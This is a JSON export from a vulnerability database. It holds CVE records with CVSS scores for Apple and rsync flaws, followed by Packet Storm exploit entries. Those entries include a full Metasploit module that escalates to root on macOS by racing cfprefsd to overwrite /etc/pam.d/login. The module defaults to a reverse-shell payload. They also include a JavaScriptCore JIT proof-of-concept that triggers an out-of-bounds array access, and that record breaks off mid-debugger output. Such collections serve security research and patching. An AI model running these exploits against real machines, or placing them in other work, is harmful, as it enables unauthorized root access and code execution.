{"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T17:15:00", "type": "prion", "title": "Code injection", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9802"], "modified": "2023-01-09T16:41:00", "id": "PRION:CVE-2020-9802", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2020-9802", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T01:50:09", "description": "A memory consumption issue was addressed with improved memory handling. This issue is fixed in iOS 13.5 and iPadOS 13.5, iOS 12.4.7, watchOS 6.2.5, watchOS 5.3.7. Processing a maliciously crafted mail message may lead to heap corruption.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 4.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2020-06-09T17:15:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9819"], "modified": "2021-07-21T11:39:00", "id": "PRION:CVE-2020-9819", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2020-9819", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-11-22T01:50:07", "description": "A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing maliciously crafted web content may lead to arbitrary code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T17:15:00", "type": "prion", "title": "Memory corruption", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9807"], "modified": "2021-12-01T02:21:00", "id": "PRION:CVE-2020-9807", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2020-9807", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T01:50:06", "description": "An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. A malicious application may cause a denial of service or potentially disclose memory contents.", "cvss3": {"cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "REQUIRED"}}, "published": "2020-06-09T17:15:00", "type": "prion", "title": "Cross site scripting", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9794"], "modified": "2023-11-07T03:27:00", "id": "PRION:CVE-2020-9794", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2020-9794", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2023-11-22T01:50:08", "description": "A logic issue existed resulting in memory corruption. This was addressed with improved state management. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. A malicious application may be able to execute arbitrary code with kernel privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T17:15:00", "type": "prion", "title": "Memory corruption", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9813"], "modified": "2021-07-21T11:39:00", "id": "PRION:CVE-2020-9813", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2020-9813", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-22T01:50:08", "description": "An information disclosure issue was addressed with improved state management. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. A local user may be able to read kernel memory.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-06-09T17:15:00", "type": "prion", "title": "Information disclosure", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9811"], "modified": "2023-01-09T16:41:00", "id": "PRION:CVE-2020-9811", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2020-9811", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-11-22T04:16:35", "description": "rsync 3.1.1 allows remote attackers to write to arbitrary files via a symlink attack on a file in the synchronization path.", "cvss3": {}, "published": "2015-02-12T16:59:00", "type": "prion", "title": "Path traversal", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9512"], "modified": "2020-07-28T20:15:00", "id": "PRION:CVE-2014-9512", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2014-9512", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-11-22T01:50:10", "description": "An entitlement parsing issue was addressed with improved parsing. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. A malicious application could interact with system processes to access private information and perform privileged actions.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.2}, "published": "2020-06-09T17:15:00", "type": "prion", "title": "Code injection", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9842"], "modified": "2023-01-09T16:41:00", "id": "PRION:CVE-2020-9842", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2020-9842", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-11-22T01:50:08", "description": "A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing maliciously crafted web content may lead to universal cross site scripting.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.7}, "published": "2020-06-09T17:15:00", "type": "prion", "title": "Cross site scripting", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9805"], "modified": "2023-01-09T16:41:00", "id": "PRION:CVE-2020-9805", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2020-9805", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-11-22T01:50:07", "description": "A type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing maliciously crafted web content may lead to arbitrary code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T17:15:00", "type": "prion", "title": "Type confusion", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9800"], "modified": "2023-01-09T16:41:00", "id": "PRION:CVE-2020-9800", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2020-9800", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T01:50:11", "description": "An input validation issue was addressed with improved input validation. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing maliciously crafted web content may lead to a cross site scripting attack.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.7}, "published": "2020-06-09T17:15:00", "type": "prion", "title": "Cross site scripting", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9843"], "modified": "2023-01-09T16:41:00", "id": "PRION:CVE-2020-9843", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2020-9843", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-09-07T17:13:15", "description": "", "cvss3": {}, "published": "2020-09-07T00:00:00", "type": "packetstorm", "title": "macOS cfprefsd Arbitrary File Write / Local Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-9839"], "modified": "2020-09-07T00:00:00", "id": "PACKETSTORM:159084", "href": "https://packetstormsecurity.com/files/159084/macOS-cfprefsd-Arbitrary-File-Write-Local-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Post::File \ninclude Msf::Post::OSX::Priv \ninclude Msf::Post::OSX::System \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'macOS cfprefsd Arbitrary File Write Local Privilege Escalation', \n'Description' => %q{ \nThis module exploits an arbitrary file write in cfprefsd on macOS <= 10.15.4 in \norder to run a payload as root. The CFPreferencesSetAppValue function, which is \nreachable from most unsandboxed processes, can be exploited with a race condition \nin order to overwrite an arbitrary file as root. By overwriting /etc/pam.d/login \na user can then login as root with the `login root` command without a password. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Yonghwi Jin <jinmoteam[at]gmail.com>', # pwn2own2020 \n'Jungwon Lim <setuid0[at]protonmail.com>', # pwn2own2020 \n'Insu Yun <insu[at]gatech.edu>', # pwn2own2020 \n'Taesoo Kim <taesoo[at]gatech.edu>', # pwn2own2020 \n'timwr' # metasploit integration \n], \n'References' => [ \n['CVE', '2020-9839'], \n['URL', 'https://github.com/sslab-gatech/pwn2own2020'], \n], \n'Platform' => 'osx', \n'Arch' => ARCH_X64, \n'DefaultTarget' => 0, \n'DefaultOptions' => { 'WfsDelay' => 300, 'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp' }, \n'Targets' => [ \n[ 'Mac OS X x64 (Native Payload)', {} ], \n], \n'DisclosureDate' => 'Mar 18 2020' \n) \n) \nregister_advanced_options [ \nOptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) \n] \nend \n \n@@target_file = \"/etc/pam.d/login\" \n@@original_content = %q(# login: auth account password session \nauth optional pam_krb5.so use_kcminit \nauth optional pam_ntlm.so try_first_pass \nauth optional pam_mount.so try_first_pass \nauth required pam_opendirectory.so try_first_pass \naccount required pam_nologin.so \naccount required pam_opendirectory.so \npassword required pam_opendirectory.so \nsession required pam_launchd.so \nsession required pam_uwtmp.so \nsession optional pam_mount.so \n) \n@@replacement_content = %q(# login: auth account password session \nauth optional pam_permit.so \nauth optional pam_permit.so \nauth optional pam_permit.so \nauth required pam_permit.so \naccount required pam_permit.so \naccount required pam_permit.so \npassword required pam_permit.so \nsession required pam_permit.so \nsession required pam_permit.so \nsession optional pam_permit.so \n) \n \ndef check \nversion = Gem::Version.new(get_system_version) \nif version > Gem::Version.new('10.15.4') \nCheckCode::Safe \nelsif version < Gem::Version.new('10.15') \nCheckCode::Safe \nelse \nCheckCode::Appears \nend \nend \n \ndef exploit \nif is_root? \nfail_with Failure::BadConfig, 'Session already has root privileges' \nend \n \nunless writable? datastore['WritableDir'] \nfail_with Failure::BadConfig, \"#{datastore['WritableDir']} is not writable\" \nend \n \npayload_file = \"#{datastore['WritableDir']}/.#{rand_text_alphanumeric(5..10)}\" \nbinary_payload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded) \nupload_and_chmodx payload_file, binary_payload \nregister_file_for_cleanup payload_file \n \ncurrent_content = read_file(@@target_file) \n@restore_content = current_content \n \nif current_content == @@replacement_content \nprint_warning(\"The contents of #{@@target_file} was already replaced\") \nelsif current_content != @@original_content \nprint_warning(\"The contents of #{@@target_file} did not match the expected contents\") \n@restore_content = nil \nend \n \nexploit_file = \"#{datastore['WritableDir']}/.#{rand_text_alphanumeric(5..10)}\" \nexploit_exe = exploit_data 'CVE-2020-9839', 'exploit' \nupload_and_chmodx exploit_file, exploit_exe \nregister_file_for_cleanup exploit_file \n \nexploit_cmd = \"#{exploit_file} #{@@target_file}\" \nprint_status(\"Executing exploit '#{exploit_cmd}'\") \nresult = cmd_exec(exploit_cmd) \nprint_status(\"Exploit result:\\n#{result}\") \nunless write_file(@@target_file, @@replacement_content) \nprint_error(\"#{@@target_file} could not be written\") \nend \n \nlogin_cmd = \"echo '#{payload_file} & disown' | login root\" \nprint_status(\"Running cmd:\\n#{login_cmd}\") \nresult = cmd_exec(login_cmd) \nunless result.blank? \nprint_status(\"Command output:\\n#{result}\") \nend \nend \n \ndef new_session_cmd(session, cmd) \nif session.type.eql? 'meterpreter' \nsession.sys.process.execute '/bin/bash', \"-c '#{cmd}'\" \nelse \nsession.shell_command_token cmd \nend \nend \n \ndef on_new_session(session) \nreturn super unless @restore_content \nif write_file(@@target_file, @restore_content) \nnew_session_cmd(session, \"chgrp wheel #{@@target_file}\") \nnew_session_cmd(session, \"chown root #{@@target_file}\") \nnew_session_cmd(session, \"chmod 644 #{@@target_file}\") \nprint_good(\"#{@@target_file} was restored\") \nelse \nprint_error(\"#{@@target_file} could not be restored!\") \nend \nsuper \nend \n \nend \n`\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/159084/cfprefsd_race_condition.rb.txt"}, {"lastseen": "2020-06-04T01:13:15", "description": "", "cvss3": {}, "published": "2020-06-03T00:00:00", "type": "packetstorm", "title": "JSC JIT Out-Of-Bounds Access", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-9802"], "modified": "2020-06-03T00:00:00", "id": "PACKETSTORM:157926", "href": "https://packetstormsecurity.com/files/157926/JSC-JIT-Out-Of-Bounds-Access.html", "sourceData": "`JSC: JIT: Incorrect Common Subexpression Elimination for ArithNegate, leading to OOB accesses \n \nThe DFG and FTL JIT compilers incorrectly replace Checked with Unchecked ArithNegate operations (and vice versa) during Common Subexpression Elimination. This can then be exploited to cause out-of-bounds accesses and potentially other memory safety violations. \n \n# Background: Common Subexpression Elimination \n \nConsider the following JS code: \n \nlet c = a + b; \nlet d = a + b; \n \nAssume further that a and b are 32 bit integer values, then a JS JIT compiler can convert the code to the following: \n \nlet c = a + b; \nlet d = c; \n \nAnd that way save one ArithAdd operation at runtime. This optimization is called Common Subexpression Elimination (CSE) [1]. \n \nNow, consider the following JS code instead: \n \nlet c = o.a; \nf(); \nlet d = o.a; \n \nHere, the compiler can not eliminate the 2nd property load operation during CSE as the function call in between could have changed the value of the .a property. \n \nThe modelling of whether an operation can be subject to CSE and under which circumstances is done in DFGClobberrize. For ArithAdd, DFGClobberize contains [2]: \n \ncase ArithAdd: \ndef(PureValue(node, node->arithMode())); \n \nPureValue here means that the computation does not rely on the context and thus that the computation performed on the same inputs will always yield the same result regardless of the context in which it executes. In contrast, for GetByOffset (which can be used for the property load), DFGClobberize contains [3]: \n \ncase GetByOffset: \nunsigned identifierNumber = node->storageAccessData().identifierNumber; \nAbstractHeap heap(NamedProperties, identifierNumber); \nread(heap); \ndef(HeapLocation(NamedPropertyLoc, heap, node->child2()), LazyNode(node)); \n \nThis in essense says that the value produced by this operation depends on the NamedProperty \\\"abstract heap\\\". As such, eliminating a 2nd GetByOffset is only sound if there are no writes to the NamedProperties abstract heap (i.e. to memory locations containing property values) between the two GetByOffset operations. \n \n# The Bug \n \nFor the ArithNegate operation, DFGClobberrize contains [4]: \n \ncase ArithNegate: \nif (node->child1().useKind() == Int32Use \n|| node->child1().useKind() == DoubleRepUse \n|| node->child1().useKind() == Int52RepUse) \ndef(PureValue(node)); \n \nThis states that if the inputs are known to be integers or doubles, then any two ArithNegate operations with the same input node can always be substituted for each other by CSE. \n \nHowever, the ArithNegate operation comes in different \\\"flavours\\\", for example as Checked or Unchecked negation [5], indicating whether the operation will perform an overflow check at runtime or not. To see why a Checked ArithNegate is usually necessary, consider the 32 bit integer negation of -2147483648, which, as it is INT_MIN, will again result in -2147483648. As this would normally be incorrect for a JavaScript value (in JS all numbers are supposed to behave as 64bit floating point values, so negating -2147483648 should become 2147483648), an overflow check normally has to be performed, and, if that fails, a bailout needs to happen. \n \nAs the modelling in DFGClobberrize does not include the ArithMode (Checked or Unchecked), the compiler will convert \n \nlet x = -i; // Without overflow check, -2147483648 again becomes -2147483648 \nlet y = -i; // With overflow check, -2147483648 causes a bailout due to overflow \n \ninto \n \nlet x = -i; // Without overflow check \nlet y = x; // Incorrect, didn't check for overflow! \n \nWhich is incorrect. \n \n# Triggering the Bug \n \nIt doesn't seem straight-forward to trigger the bug with two consecutive ArithNegate operations as the compiler seems to normally convert the inputs to doubles prior to the ArithNegate, thus not leading to issues as no overflow checks are required anyway. \n \nHowever, there is an interesting case in the IntegerRangeOptimization phase that can be used to trigger this bug. Given the following code: \n \nfunction f(n) { \n// Must not have a zero constant in this function due to this bug: https://bugs.webkit.org/show_bug.cgi?id=200018 \n \n// Force n to be a 32bit integer \nn &= 0xffffffff; \n \n// Teach the IntegerRangeOptimization that n will be a negative number inside the if \nif (n < -1) { \n// Force \\\"non-number bytecode usage\\\" so the negation becomes unchecked \nlet v = (-n)&0xffffffff; \n \n// As n is known to be negative here, this ArithAbs will become a ArithNegate. \n// That negation will be checked, but then be CSE'd for the previous, unchecked one... \nreturn Math.abs(n); \n} \n} \n \nHere is what will happen during DFG compilation: \n \nFirst, during the DFGFixup phase, the negation ((-n)&0xffffffff) is converted to an unchecked ArithNegate as the result is not used as a number but just a 32 bit integer, in which case an overflow is non observable [6]. \n \nNext, in the IntegerRangeOptimization the compiler marks n as being a negative number when inside the body of the if statement [7], then marks the output of the ArithAbs operation as being a positive number with this code [8] \n \ncase ArithAbs: { \nif (node->child1().useKind() != Int32Use) \nbreak; \nsetRelationship(Relationship(node, m_zero, Relationship::GreaterThan, -1)); \nbreak; \n \nAfterwards, still in the same phase, the ArithAbs is transformed by this code snippet [9]: \n \ncase ArithAbs: { \n...; \n \nif (maxValue < 0 || (absIsUnchecked && maxValue <= 0)) { \nnode->convertToArithNegate(); \n...; \n \nHere, as the input to the ArithAbs is known to be a negative number, the ArithAbs is replaced with a Checked (necessary to correctly handle the INT_MIN case) ArithNegate operation. \n \nFinally, the GlobalCSE phase runs and replaces the new, checked, ArithNegate with the previous, unchecked, ArithNegate operation. \nAt this point the emitted code behaves incorrectly when passed INT_MIN as input: \n \nf(-2147483648); \n// returns -2147483648 \n \n \n# Causing Memory Safety Violations \n \nIt is possible to exploit this bug to cause a memory safety violation by again abusing the IntegerRangeOptimization pass to incorrectly eliminate a bounds check. There may also exist other ways in which this bug can be exploited. \n \nThe following code leads to an out-of-bounds access on an array after being JIT compiled by DFG/FTL: \n \nconst ITERATIONS = 1000000; \n \nfunction f(n) { \n// Must not have a zero constant in this function due to this bug: https://bugs.webkit.org/show_bug.cgi?id=200018 \n \n// Force n to be a 32bit integer \nn &= 0xffffffff; \n \n// Teach the IntegerRangeOptimization that n will be a negative number inside the if \nif (n < -1) { \n// Force \\\"non-number bytecode usage\\\" so the negation becomes unchecked \nlet v = (-n)&0xffffffff; \n \n// As n is known to be negative here, this ArithAbs will become a ArithNegate. \n// That negation will be checked, but then be incorrectly CSE'd for the previous, unchecked one. \nlet i = Math.abs(n); \n \n// However, the IntegerRangeOptimization pass has also marked i as being >= 0... \n \nlet arr = new Array(10); \narr.fill(42.42); \n \nif (i < arr.length) { \n// .. so here IntegerRangeOptimization believes i will be in the range \n// [0, arr.length) and thus eliminates the CheckBounds node. \n// Howver, when given INT_MIN as input, i will, due to the bug, \n// actually also be INT_MIN here, thus leading to an OOB access. \nreturn arr[i]; \n} \n} \n} \n \nfor (let i = 0; i < ITERATIONS; i++) { \nlet isLastIteration = i == ITERATIONS - 1; \nlet n = -(i % 10); \nif (isLastIteration) { \nn = -2147483648; \n} \nf(n); \n} \n \n/* \nlldb -- /System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc poc.js \n(lldb) r \nProcess 12237 launched: '/System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc' (x86_64) \nProcess 12237 stopped \n* thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS 